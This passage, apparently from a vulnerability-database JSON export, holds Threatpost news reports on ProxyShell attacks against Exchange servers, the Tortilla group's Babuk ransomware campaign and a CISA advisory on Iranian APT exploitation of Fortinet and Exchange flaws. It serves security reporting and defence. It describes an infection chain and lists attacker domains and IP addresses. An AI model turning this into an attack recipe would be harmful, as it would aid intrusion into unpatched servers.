"confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-12149", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-10-01T12:36:25", "id": "THREATPOST:EDFBDF12942A6080DE3FAE980A53F496", "href": "https://threatpost.com/apt-chamelgang-targets-russian-energy-aviation/175272/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-11-04T16:00:33", "description": "A new-ish threat actor sometimes known as \u201cTortilla\u201d is launching a fresh round of ProxyShell attacks on Microsoft Exchange servers, this time with the aim of inflicting vulnerable servers with variants of the Babuk ransomware.\n\nCisco Talos researchers said in a Wednesday [report](<https://blog.talosintelligence.com/2021/11/babuk-exploits-exchange.html?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+feedburner%2FTalos+%28Talos%E2%84%A2+Blog%29>) that they spotted the malicious campaign a few weeks ago, on Oct. 12.\n\nTortilla, an actor that\u2019s been operating since July, is predominantly targeting U.S. victims. It\u2019s also hurling a smaller number of infections that have hit machines in the Brazil, Finland, Germany, Honduras, Thailand, Ukraine and the U.K., as shown on the map below.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/11/03120718/ProxShell-Babuk-map-e1635955653968.jpeg>)\n\nVictim distribution map. Source: Cisco Talos.\n\nPrior to this ransomware-inflicting campaign, Tortilla has been experimenting with other payloads, such as the PowerShell-based netcat clone PowerCat.\n\nPowerCat has a penchant for Windows, the researchers explained, being \u201cknown to provide attackers with unauthorized access to Windows machines.\u201d\n\n## ProxyShell\u2019s New Attack Surface\n\nProxyShell is a name given to an attack that chains a trio of vulnerabilities together (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207), to enable unauthenticated attackers to perform remote code execution (RCE) and to snag plaintext passwords.\n\nThe attack was outlined in a presentation ([PDF](<https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-ProxyLogon-Is-Just-The-Tip-Of-The-Iceberg-A-New-Attack-Surface-On-Microsoft-Exchange-Server.pdf>)) given by Devcore principal security researcher [Orange Tsai](<https://twitter.com/orange_8361>) at Black Hat in April. In it, Tsai disclosed an entirely new attack surface in Exchange, and a [barrage](<https://threatpost.com/exchange-servers-attack-proxyshell/168661/>) of [attacks](<https://threatpost.com/proxyshell-attacks-unpatched-exchange-servers/168879/>) soon followed. August was glutted with reports of threat actors exploiting ProxyShell to launch [webshell attacks](<https://threatpost.com/proxyshell-attacks-unpatched-exchange-servers/168879/>), as well as to deliver [LockFile ransomware](<https://pbs.twimg.com/media/E9TmPo6XMAYCnO-?format=jpg&name=4096x4096>)..\n\nIn this latest ProxyShell campaign, Cisco Talos researchers said that the threat actor is using \u201ca somewhat unusual infection chain technique where an intermediate unpacking module is hosted on a pastebin.com clone pastebin.pl\u201d to deliver Babuk.\n\nThey continued: \u201cThe intermediate unpacking stage is downloaded and decoded in memory before the final payload embedded within the original sample is decrypted and executed.\u201d\n\n## Who\u2019s Babuk?\n\nBabuk is a ransomware that\u2019s probably best known for its starring role in a breach of the Washington D.C. police force [in April](<https://threatpost.com/babuk-ransomware-washington-dc-police/165616/>). The gang behind the malware has a short history, having only been [identified in 2021](<https://www.mcafee.com/blogs/other-blogs/mcafee-labs/babuk-ransomware/>), but that history shows that it\u2019s a [double-extortion](<https://threatpost.com/double-extortion-ransomware-attacks-spike/154818/>) player: one that threatens to post stolen data in addition to encrypting files, as a way of applying thumbscrews so victims will pay up.\n\nThat tactic has worked. As [McAfee](<https://www.mcafee.com/blogs/other-blogs/mcafee-labs/babuk-ransomware/>) described in February, Babuk the ransomware had already been lobbed at a batch of at least five big enterprises, with one score: The gang walked away with $85,000 after one of those targets ponied up the money, McAfee researchers said.\n\nIts victims have included Serco, an outsourcing firm that confirmed that it had been [slammed](<https://www.computerweekly.com/news/252495684/Serco-confirms-Babuk-ransomware-attack>) with a double-extortion ransomware attack in late January.\n\nLike many ransomware strains, Babuk is ruthless: It not only encrypts a victim\u2019s machine, it also [blows up backups](<https://threatpost.com/conti-ransomware-backups/175114/>) and deletes the volume shadow copies, Cisco Talos said.\n\n## What\u2019s Under Babuk\u2019s Hood\n\nOn the technical side, Cisco Talos described Babuk as a flexible ransomware that can be compiled, through a ransomware builder, for several hardware and software platforms.\n\nIt\u2019s mostly compiled for Windows and ARM for Linux, but researchers said that, over time, they\u2019ve also seen versions for ESX and a 32-bit, old PE executable.\n\nIn this recent October campaign though, the threat actors are specifically targeting Windows.\n\n## China Chopper Chops Again\n\nPart of the infection chain involves China Chopper: A webshell that dates back to 2010 but which has [clung to relevancy since](<https://threatpost.com/china-chopper-tool-multiple-campaigns/147813/>), including reportedly being used in a massive 2019 attack against telecommunications providers called [Operation Soft Cell](<https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers>). The webshell enables attackers to \u201cretain access to an infected system using a client-side application which contains all the logic required to control the target,\u201d as Cisco Talos [described](<https://blog.talosintelligence.com/2019/08/china-chopper-still-active-9-years-later.html>) the webshell in 2019.\n\nThis time around, it\u2019s being used to get to Exchange Server systems. \u201cWe assess with moderate confidence that the initial infection vector is exploitation of ProxyShell vulnerabilities in Microsoft Exchange Server through the deployment of China Chopper web shell,\u201d according to the Cisco Talos writeup.\n\n## The Infection Chain\n\nAs shown in the infection flow chart below, the actors are using either a DLL or .NET executable to kick things off on the targeted system. \u201cThe initial .NET executable module runs as a child process of w3wp.exe and invokes the command shell to run an obfuscated PowerShell command,\u201d according to Cisco Talos\u2019 report.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/11/03130541/infection-flow-chart-e1635959155173.jpeg>)\n\nInfection flow chart. Source: Cisco Talos.\n\n\u201cThe PowerShell command invokes a web request and downloads the payload loader module using certutil.exe from a URL hosted on the domains fbi[.]fund and xxxs[.]info, or the IP address 185[.]219[.]52[.]229,\u201d researchers said.\n\n\u201cThe payload loader downloads an intermediate unpacking stage from the PasteBin clone site pastebin.pl,\u201d they continued \u2013 a site that \u201cseems to be unrelated to the popular pastebin.com.\u201d\n\nThey continued: \u201cThe unpacker concatenates the bitmap images embedded in the resource section of the trojan and decrypts the payload into the memory. The payload is injected into the process AddInProcess32 and is used to encrypt files on the victim\u2019s server and all mounted drives.\u201d\n\n## More Ingredients in Tortilla\u2019s Infrastructure\n\nBesides the pastebin.pl site that hosts Tortilla\u2019s intermediate unpacker code, Tortilla\u2019s infrastructure also includes a Unix-based download server.\n\nThe site is legitimate, but Cisco Talos has seen multiple malicious campaigns running on it, including hosting variants of the [AgentTesla trojan](<https://threatpost.com/agent-tesla-microsoft-asmi/163581/>) and the [FormBook malware dropper.](<https://threatpost.com/new-formbook-dropper-harbors-persistence/145614/>)\n\n## Babuk\u2019s Code Spill Helps Newbies\n\nIn July, Babuk gang\u2019s source code and builder were spilled: They were [uploaded to VirusTotal](<https://threatpost.com/babuk-ransomware-builder-virustotal/167481/>), making it available to all security vendors and competitors. That leak has helped the ransomware spread to even an inexperienced, green group like Tortilla, Cisco Talos said.\n\nThe leak \u201cmay have encouraged new malicious actors to manipulate and deploy the malware,\u201d researchers noted.\n\n\u201cThis actor has only been operating since early July this year and has been experimenting with different payloads, apparently in order to obtain and maintain remote access to the infected systems,\u201d according to its writeup.\n\nWith Babuk source code readily available, all the Tortilla actors have to know is how to tweak it a tad, researchers said: A scenario that observers predicted back when the code appeared.\n\n\u201cThe actor displays low to medium skills with a decent understanding of the security concepts and the ability to create minor modifications to existing malware and offensive security tools,\u201d Cisco Talos researchers said in assessing the Tortilla gang.\n\n## Decryptor Won\u2019t Work on Variant\n\nWhile a free [Babuk decryptor was released](<https://www.bleepingcomputer.com/news/security/babuk-ransomware-decryptor-released-to-recover-files-for-free/>) last week, it won\u2019t work on the Babuk variant seen in this campaign, according to the writeup: \u201cUnfortunately, it is only effective on files encrypted with a number of leaked keys and cannot be used to decrypt files encrypted by the variant described in this blog post.\u201d\n\n## How to Keep Exchange Safe\n\nTortilla is hosting malicious modules and conducting internet-wide scanning to exploit vulnerable hosts.\n\nThe researchers recommended staying vigilant, staying on top of any infection in its early stages and implementing a layered defense security, \u201cwith the behavioral protection enabled for endpoints and servers to detect the threats at an early stage of the infection chain.\u201d\n\nThey also recommended keeping servers and apps updated so as to squash vulnerabilities, such as the trio of CVEs exploited in the ProxyShell attacks.\n\nAlso, keep an eye out for backup demolition, as the code deletes shadow copies: \u201cBabuk ransomware is nefarious by its nature and while it encrypts the victim\u2019s machine, it interrupts the system backup process and deletes the volume shadow copies,\u201d according to Cisco Talos.\n\nOn top of all that, bolster detection: Watch out for system configuration changes, suspicious events generated by detection systems for an abrupt service termination, or abnormally high I/O rates for drives attached to servers, according to Cisco Talos.\n\n_**Check out our free **_[_**upcoming live and on-demand online town halls**_](<https://threatpost.com/category/webinars/>)_** \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-03T18:16:37", "type": "threatpost", "title": "\u2018Tortilla\u2019 Wraps Exchange Servers in ProxyShell Attacks", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-43267"], "modified": "2021-11-03T18:16:37", "id": "THREATPOST:52923238811C7BFD39E0529C85317249", "href": "https://threatpost.com/tortilla-exchange-servers-proxyshell/175967/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-13T19:26:48", "description": "Researchers\u2019 Microsoft Exchange server honeypots are being actively exploited via ProxyShell: The name of an attack disclosed at Black Hat last week that chains three vulnerabilities to enable unauthenticated attackers to perform remote code execution (RCE) and snag plaintext passwords.\n\nIn his Black Hat [presentation](<https://www.blackhat.com/us-21/briefings/schedule/#proxylogon-is-just-the-tip-of-the-iceberg-a-new-attack-surface-on-m>) last week, Devcore principal security researcher [Orange Tsai](<https://twitter.com/orange_8361>) said that a survey shows more than 400,000 Exchange servers on the internet that are exposed to the attack via port 443. On Monday, the SANS Internet Storm Center\u2019s Jan Kopriva [reported](<https://isc.sans.edu/forums/diary/ProxyShell+how+many+Exchange+servers+are+affected+and+where+are+they/27732/>) that he found more than 30,000 vulnerable Exchange servers via a Shodan scan and that any threat actor worthy of that title would find it a snap to pull off, given how much information is available.\n\nGoing by calculations tweeted by security researcher Kevin Beaumont, this means that, between ProxyLogon and ProxyShell, \u201cjust under 50 percent of internet-facing Exchange servers\u201d are currently vulnerable to exploitation, according to a Shodan search.\n\n> Breakdown of Exchange servers on Shodan vulnerable to ProxyShell or ProxyLogon, it's just under 50% of internet facing Exchange servers. [pic.twitter.com/3samyNHBpB](<https://t.co/3samyNHBpB>)\n> \n> \u2014 Kevin Beaumont (@GossiTheDog) [August 13, 2021](<https://twitter.com/GossiTheDog/status/1426207905779527682?ref_src=twsrc%5Etfw>)\n\nOn the plus side, Microsoft has already released patches for all of the vulnerabilities in question, and, cross your fingers, \u201cchances are that most organizations that take security at least somewhat seriously have already applied the patches,\u201d Kopriva wrote.\n\n[](<https://threatpost.com/infosec-insider-subscription-page/?utm_source=ART&utm_medium=ART&utm_campaign=InfosecInsiders_Newsletter_Promo/>)\n\nThe vulnerabilities affect Exchange Server 2013, 2016 and 2019.\n\nOn Thursday, Beaumont and NCC Group\u2019s vulnerability researcher Rich Warren disclosed that threat actors have exploited their Microsoft Exchange honeypots using the ProxyShell vulnerability.\n\n\u201cStarted to see in the wild exploit attempts against our honeypot infrastructure for the Exchange ProxyShell vulnerabilities,\u201d Warren tweeted, along with a screen capture of the code for a c# aspx webshell dropped in the /aspnet_client/ directory.\n\n> Started to see in the wild exploit attempts against our honeypot infrastructure for the Exchange ProxyShell vulnerabilities. This one dropped a c# aspx webshell in the /aspnet_client/ directory: [pic.twitter.com/XbZfmQQNhY](<https://t.co/XbZfmQQNhY>)\n> \n> \u2014 Rich Warren (@buffaloverflow) [August 12, 2021](<https://twitter.com/buffaloverflow/status/1425831100157349890?ref_src=twsrc%5Etfw>)\n\nBeaumont [tweeted](<https://twitter.com/GossiTheDog/status/1425844380376735746>) that he was seeing the same and connected it to Tsai\u2019s talk: \u201cExchange ProxyShell exploitation wave has started, looks like some degree of spraying. Random shell names for access later. Uses foo name from @orange_8361\u2019s initial talk.\u201d\n\n> Exchange ProxyShell exploitation wave has started, looks like some degree of spraying. Random shell names for access later. Uses foo name from [@orange_8361](<https://twitter.com/orange_8361?ref_src=twsrc%5Etfw>)'s initial talk.\n> \n> \u2014 Kevin Beaumont (@GossiTheDog) [August 12, 2021](<https://twitter.com/GossiTheDog/status/1425844380376735746?ref_src=twsrc%5Etfw>)\n\n## Dangerous Skating on the New Attack Surface\n\nIn [a post](<https://devco.re/blog/2021/08/06/a-new-attack-surface-on-MS-exchange-part-1-ProxyLogon/>) on Sunday, Tsai recounted the in-the-wild ProxyLogon proof of concept that Devco reported to MSRC in late February, explaining that it made the researchers \u201cas curious as everyone after eliminating the possibility of leakage from our side through a thorough investigation.\n\n\u201cWith a clearer timeline appearing and more discussion occurring, it seems like this is not the first time that something like this happened to Microsoft,\u201d he continued. Mail server is both a highly valuable asset and a seemingly irresistible target for attackers, given that it holds businesses\u2019 confidential secrets and corporate data.\n\n\u201cIn other words, controlling a mail server means controlling the lifeline of a company,\u201d Tsai explained. \u201cAs the most common-use email solution, Exchange Server has been the top target for hackers for a long time. Based on our research, there are more than four hundred thousands Exchange Servers exposed on the Internet. Each server represents a company, and you can imagine how horrible it is while a severe vulnerability appeared in Exchange Server.\u201d\n\nDuring his Black Hat presentation, Tsai explained that the new attack surface his team discovered is based on \u201ca significant change in Exchange Server 2013, where the fundamental protocol handler, Client Access Service (CAS), splits into frontend and backend\u201d \u2013 a change that incurred \u201cquite an amount of design\u201d and yielded eight vulnerabilities, consisting of server-side bugs, client-side bugs and crypto bugs.\n\nHe chained the bugs into three attack vectors: The now-infamous [ProxyLogon](<https://threatpost.com/microsoft-exchange-exploits-ransomware/164719/>) that induced [patching frenzy](<https://threatpost.com/microsoft-exchange-servers-proxylogon-patching/165001/>) a few months back, the ProxyShell vector that\u2019s now under active attack, and another vector called ProxyOracle.\n\n\u201cThese attack vectors enable any unauthenticated attacker to uncover plaintext passwords and even execute arbitrary code on Microsoft Exchange Servers through port 443, which is exposed to the Internet by about 400,000 Exchange Servers,\u201d according to the presentation\u2019s introduction.\n\nThe three Exchange vulnerabilities, all of which are [patched](<https://threatpost.com/microsoft-crushes-116-bugs/167764/>), that Tsai chained for the ProxyShell attack:\n\n * [CVE-2021-34473](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34473>) \u2013 Pre-auth path confusion leads to ACL bypass\n * [CVE-2021-34523](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34523>) \u2013 Elevation of privilege on Exchange PowerShell backend\n * [CVE-2021-31207](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31207>) \u2013 Post-auth arbitrary file-write leads to RCE\n\nProxyShell earned the Devcore team a $200,000 bounty after they used the bugs to take over an Exchange server at the [Pwn2Own 2021](<https://twitter.com/thezdi/status/1379467992862449664>) contest in April.\n\nDuring his Black Hat talk, Tsai said that he discovered the Exchange vulnerabilities when targeting the Microsoft Exchange CAS attack surface. As Tsai explained, CAS is \u201ca fundamental component\u201d of Exchange.\n\nHe referred to [Microsoft\u2019s documentation](<https://docs.microsoft.com/en-us/exchange/architecture/architecture?view=exchserver-2019>), which states:\n\n\u201cMailbox servers contain the Client Access services that accept client connections for all protocols. These frontend services are responsible for routing or proxying connections to the corresponding backend services on a Mailbox server.\u201d\n\n\u201cFrom the narrative you could realize the importance of CAS, and you could imagine how critical it is when bugs are found in such infrastructure. CAS was where we focused on, and where the attack surface appeared,\u201d Tsai wrote. \u201cCAS is the fundamental component in charge of accepting all the connections from the client side, no matter if it\u2019s HTTP, POP3, IMAP or SMTP, and proxies the connections to the corresponding backend service.\u201d\n\n## ProxyShell Just the \u2018Tip of the Iceberg\u2019\n\nOut of all the bugs he found in the new attack surface, Tsai dubbed [CVE-2020-0688](<https://www.zerodayinitiative.com/blog/2020/2/24/cve-2020-0688-remote-code-execution-on-microsoft-exchange-server-through-fixed-cryptographic-keys>) (an RCE vulnerability that involved a hard-coded cryptographic key in Exchange) the \u201cmost surprising.\u201d\n\n\u201cWith this hard-coded key, an attacker with low privilege can take over the whole Exchange Server,\u201d he wrote. \u201cAnd as you can see, even in 2020, a silly, hard-coded cryptographic key could still be found in an essential software like Exchange. This indicated that Exchange is lacking security reviews, which also inspired me to dig more into the Exchange security.\u201d\n\nBut the \u201cmost interesting\u201d flaw is [CVE-2018-8581](<https://www.zerodayinitiative.com/blog/2018/12/19/an-insincere-form-of-flattery-impersonating-users-on-microsoft-exchange>), he said, which was disclosed by someone who cooperated with ZDI. Though it\u2019s a \u201csimple\u201d server-side request forgery (SSRF), it could be combined with NTLM Relay, enabling the attacker to \u201cturn a boring SSRF into [something really fancy,\u201d Tsai said.](<https://dirkjanm.io/abusing-exchange-one-api-call-away-from-domain-admin/>)\n\nFor example, it could \u201cdirectly control the whole Domain Controller through a low-privilege account,\u201d Tsai said.\n\n## Autodiscover Figures into ProxyShell\n\nAs [BleepingComputer](<https://www.bleepingcomputer.com/news/microsoft/microsoft-exchange-servers-are-getting-hacked-via-proxyshell-exploits/>) reported, during his presentation, Tsai explained that one of the components of the ProxyShell attack chain targets the Microsoft Exchange [Autodiscover](<https://docs.microsoft.com/en-us/exchange/architecture/client-access/autodiscover?view=exchserver-2019>) service: a service that eases configuration and deployment by providing clients access to Exchange features with minimal user input.\n\nTsai\u2019s talk evidently triggered a wave of scanning for the vulnerabilities by attackers.\n\nAfter watching the presentation, other security researchers replicated the ProxyShell exploit. The day after Tsai\u2019s presentation, last Friday, PeterJson and Nguyen Jang [published](<https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1>) more detailed technical information about their successful reproduction of the exploit.\n\nSoon after, Beaumont [tweeted](<https://twitter.com/GossiTheDog/status/1422178411385065476?ref_src=twsrc%5Etfw%7Ctwcamp%5Etweetembed%7Ctwterm%5E1422178411385065476%7Ctwgr%5E%7Ctwcon%5Es1_&ref_url=https%3A%2F%2Fwww.bleepingcomputer.com%2Fnews%2Fmicrosoft%2Fmicrosoft-exchange-servers-scanned-for-proxyshell-vulnerability-patch-now%2F>) about a threat actor who was probing his Exchange honeypot using the [Autodiscover service](<https://docs.microsoft.com/en-us/exchange/architecture/client-access/autodiscover?view=exchserver-2019>). As of yesterday, Aug. 12, those servers were being targeted using autodiscover.json, he tweeted.\n\n> Exchange ProxyShell exploitation wave has started, looks like some degree of spraying. Random shell names for access later. Uses foo name from [@orange_8361](<https://twitter.com/orange_8361?ref_src=twsrc%5Etfw>)'s initial talk.\n> \n> \u2014 Kevin Beaumont (@GossiTheDog) [August 12, 2021](<https://twitter.com/GossiTheDog/status/1425844380376735746?ref_src=twsrc%5Etfw>)\n\nAs of Thursday, ProxyShell was dropping a 265K webshell \u2013 the minimum file size that can be created via ProxyShell due to its use of the Mailbox Export function of Exchange Powershell to create PST files \u2013 to the \u2018c:\\inetpub\\wwwroot\\aspnet_client\\\u2019 folder. Warren shared a sample with BleepingComputer that showed that the webshells consist of \u201ca simple authentication-protected script that the threat actors can use to upload files to the compromised Microsoft Exchange server.\u201d\n\nBad Packets told the outlet that as of Thursday, was seeing threat actors scanning for vulnerable ProxyShell devices from IP addresses in the U.S., Iran and the Netherlands, using the domains @abc.com and @1337.com, from the known addresses 3.15.221.32 and 194.147.142.0/24.\n\nWorried about where the next attack is coming from? We\u2019ve got your back. **[REGISTER NOW](<https://threatpost.com/webinars/how-to-think-like-a-threat-actor/?utm_source=ART&utm_medium=ART&utm_campaign=August_Uptycs_Webinar>)** for our upcoming live webinar, How to **Think Like a Threat Actor**, in partnership with Uptycs on Aug. 17 at 11 AM EST and find out precisely where attackers are targeting you and how to get there first. Join host Becky Bracken and Uptycs researchers Amit Malik and Ashwin Vamshi on **[Aug. 17 at 11AM EST for this LIVE discussion](<https://threatpost.com/webinars/how-to-think-like-a-threat-actor/?utm_source=ART&utm_medium=ART&utm_campaign=August_Uptycs_Webinar>)**.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-13T18:56:27", "type": "threatpost", "title": "Exchange Servers Under Active Attack via ProxyShell Bugs", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-8581", "CVE-2020-0688", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-08-13T18:56:27", "id": "THREATPOST:4B2E19CAF27A3EFBCB2F777C6E528317", "href": "https://threatpost.com/exchange-servers-attack-proxyshell/168661/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-11-18T02:26:11", "description": "A state-backed Iranian threat actor has been using multiple CVEs \u2013 including both serious Fortinet vulnerabilities for months and a Microsoft Exchange ProxyShell weakness for weeks \u2013 looking to gain a foothold within networks before moving laterally and launching [BitLocker](<https://threatpost.com/hades-ransomware-connections-hafnium/165069/>) ransomware and other nastiness.\n\nA joint [advisory](<https://us-cert.cisa.gov/ncas/current-activity/2021/11/17/iranian-government-sponsored-apt-cyber-actors-exploiting-microsoft>) published by CISA on Wednesday was meant to highlight the ongoing, malicious cyber assault, which has been tracked by the FBI, the U.S. Cybersecurity and Infrastructure Security Agency (CISA), the Australian Cyber Security Centre (ACSC) and the United Kingdom\u2019s National Cyber Security Centre (NCSC). All of the security bodies have traced the attacks to an Iranian government-sponsored advanced persistent threat (APT).\n\nThe Iranian APT has been exploiting Fortinet vulnerabilities since at least March 2021 and a Microsoft Exchange ProxyShell vulnerability since at least October 2021, according to the alert. The weaknesses are granting the attackers initial access to systems that\u2019s then leading to follow-on operations including ransomware, data exfiltration or encryption, and extortion.\n\nThe APT has used the same Microsoft Exchange vulnerability in Australia.\n\n## CISA Warning Follows Microsoft Report on Six Iranian Threat Groups\n\nCISA\u2019s warning came on the heels of [an analysis](<https://www.microsoft.com/security/blog/2021/11/16/evolving-trends-in-iranian-threat-actor-activity-mstic-presentation-at-cyberwarcon-2021/>) of the evolution of Iranian threat actors released by Microsoft\u2019s Threat Intelligence Center (MSTIC) on Tuesday.\n\nMSTIC researchers called out three trends they\u2019ve seen emerge since they started tracking six increasingly sophisticated Iranian APT groups in September 2020:\n\n * They are increasingly utilizing ransomware to either collect funds or disrupt their targets.\n * They are more patient and persistent while engaging with their targets.\n * While Iranian operators are more patient and persistent with their social engineering campaigns, they continue to employ aggressive brute force attacks on their targets.\n\nThey\u2019ve seen ransomware attacks coming in waves, averaging every six to eight weeks, as shown in the timeline below.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/11/17104422/Fig1b-ransomware-timeline.jpg>)\n\nTimeline of ransomware attacks by Iranian threat actors. Source: MSTIC.\n\nIn keeping with what CISA described on Wednesday, MSTIC has seen the Iran-linked [Phosphorous group](<https://threatpost.com/apt-ta453-siphons-intel-mideast/167715/>) \u2013 aka a number of names, including Charming Kitten, TA453, APT35, Ajax Security Team, NewsBeef and Newscaster \u2013 globally target the Exchange and Fortinet flaws \u201cwith the intent of deploying ransomware on vulnerable networks.\u201d\n\nThe researchers pointed to a recent blog post by the [DFIR Report](<https://thedfirreport.com/2021/11/15/exchange-exploit-leads-to-domain-wide-ransomware/>) describing a similar intrusion, in which the attackers exploited vulnerabilities in on-premise Exchange Servers to compromise their targets\u2019 environments and encrypt systems via BitLocker ransomware: activity that MSTIC also attributed to Phosphorous.\n\n## No Specific Sectors Targeted\n\nThe threat actors covered in CISA\u2019s alert aren\u2019t targeting specific sectors. Rather, they\u2019re focused on exploiting those irresistible Fortinet and Exchange vulnerabilities.\n\nThe alert advised that the APT actors are \u201cactively targeting a broad range of victims across multiple U.S. critical infrastructure sectors, including the Transportation Sector and the Healthcare and Public Health Sector, as well as Australian organizations.\u201d\n\n## Malicious Activity\n\nSince March, the Iranian APT actors have been scanning devices on ports 4443, 8443 and 10443 for the much-exploited, serious Fortinet FortiOS vulnerability tracked as [CVE-2018-13379](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13379>) \u2013 a path-traversal issue in Fortinet FortiOS, where the SSL VPN web portal allows an unauthenticated attacker to download system files via specially crafted HTTP resource requests.\n\nIt\u2019s d\u00e9j\u00e0 vu all over again: In April, CISA had [warned](<https://threatpost.com/fbi-apts-actively-exploiting-fortinet-vpn-security-holes/165213/>) about those same ports being scanned by cyberattackers looking for the Fortinet flaws. In its April alert ([PDF](<https://www.ic3.gov/media/news/2021/210402.pdf>)), CISA said that it looked like the APT actors were going after access \u201cto multiple government, commercial, and technology services networks.\u201d\n\nThat\u2019s what APT actors do, CISA said: They exploit critical vulnerabilities like the Fortinet CVEs \u201cto conduct distributed denial-of-service (DDoS) attacks, ransomware attacks, structured query language (SQL) injection attacks, spearphishing campaigns, website defacements, and disinformation campaigns.\u201d\n\nCVE-2018-13379 was just one of three security vulnerabilities in the Fortinet SSL VPN that the security bodies had seen being used to gain a foothold within networks before moving laterally and carrying out recon, as the FBI and CISA said in the April alert.\n\nAccording to Wednesday\u2019s report, the APT actors are also enumerating devices for the remaining pair of FortiOS vulnerabilities in the trio CISA saw being exploited in March, which are:\n\n * [CVE-2020-12812](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12812>), an improper-authentication vulnerability in SSL VPN in FortiOS that could allow a user to log in successfully without being prompted for the second factor of authentication (FortiToken) if they changed the case of their username, and\n * [CVE-2019-5591](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5591>): a default-configuration vulnerability in FortiOS that could allow an unauthenticated attacker on the same subnet to intercept sensitive information by impersonating the LDAP server.\n\n\u201cThe Iranian Government-sponsored APT actors likely exploited these vulnerabilities to gain access to vulnerable networks,\u201d according to Wednesday\u2019s alert.\n\nIn May, the same Iranian actors also exploited a Fortinet FortiGate firewall to gain access to a U.S. municipal government\u2019s domain. \u201cThe actors likely created an account with the username \u201celie\u201d to further enable malicious activity,\u201d CISA said, pointing to a previous FBI flash alert ([PDF](<https://www.ic3.gov/media/news/2021/210527.pdf>)) on the incident.\n\nIn June, the same APT actors exploited another FortiGate security appliance to access environmental control networks associated with a U.S. children\u2019s hospital after likely leveraging a server assigned to IP addresses 91.214.124[.]143 and 162.55.137[.]20: address that the FBI and CISA have linked with Iranian government cyber activity. They did it to \u201cfurther enable malicious activity against the hospital\u2019s network,\u201d CISA explained.\n\n\u201cThe APT actors accessed known user accounts at the hospital from IP address 154.16.192[.]70, which FBI and CISA judge is associated with government of Iran offensive cyber activity,\u201d CISA said.\n\n## Yet More Exchange ProxyShell Attacks\n\nFinally, the gang turned to exploiting a Microsoft Exchange ProxyShell vulnerability \u2013 CVE-2021-34473 \u2013 last month, in order to, again, gain initial access to systems in advance of follow-on operations. ACSC believes that the group has also used [CVE-2021-34473](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34473>) in Australia.\n\nProxyShell is a name given to an attack that chains a trio of vulnerabilities together (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207), to enable unauthenticated attackers to perform remote code execution (RCE) and to snag plaintext passwords.\n\nThe attack was outlined in a presentation ([PDF](<https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-ProxyLogon-Is-Just-The-Tip-Of-The-Iceberg-A-New-Attack-Surface-On-Microsoft-Exchange-Server.pdf>)) given by Devcore principal security researcher [Orange Tsai](<https://twitter.com/orange_8361>) at 